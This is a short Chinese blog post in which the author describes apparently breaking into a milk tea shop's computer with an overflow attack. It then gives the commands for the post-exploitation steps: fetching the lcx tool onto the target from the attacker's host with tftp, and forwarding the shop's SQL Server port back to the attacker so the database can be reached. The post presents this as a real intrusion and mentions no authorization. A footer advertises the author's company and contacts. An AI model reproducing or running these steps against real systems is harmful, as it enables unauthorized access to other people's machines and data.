文章出處
文章列表
這幾天在滲透一家奶茶店的時候, 使用溢出攻擊獲得了奶茶店shell, 截屏以后發現該電腦有安裝sqlserver, 但是數據庫無法遠程連接, 所以我決定使用端口映射工具突破端口連接限制;
我的機器地址為:192.168.1.156
奶茶店的IP地址為: 192.168.1.157
1:上傳lcx到目標機器
首先需要下載lcx這個工具:
Lcx這個工具我使用tftp上傳到目標機器, 在目標的shell中執行:
tftp -i 192.168.1.156 get lcx.exe
2:使用lcx監聽本地端口
然后執行lcx命令, 并綁定 本地的1434端口和51端口 :
lcx -listen 51 1434
3:在目標shell中執行端口轉發
目標機器的地址是192.168.1.157 , 我的機器地址為192.168.1.156:
lcx -slave 192.168.1.156 51 192.168.1.157 1433
這條命令會把目標機器的1433端口轉發到 192.168.1.156的51端口上
使用sqlservermanager連接本地機器, 連接的地址為本地機器IP的1433端口:
OVER, 連接成功
作者: NONO
出處:http://www.cnblogs.com/diligenceday/
企業網站:http://www.idrwl.com/
開源博客:http://www.github.com/sqqihao
QQ:287101329
微信:18101055830
廈門點燃未來網絡科技有限公司, 是廈門最好的微信應用, 小程序, 微信網站, 公眾號開發公司
文章列表
全站熱搜
留言列表
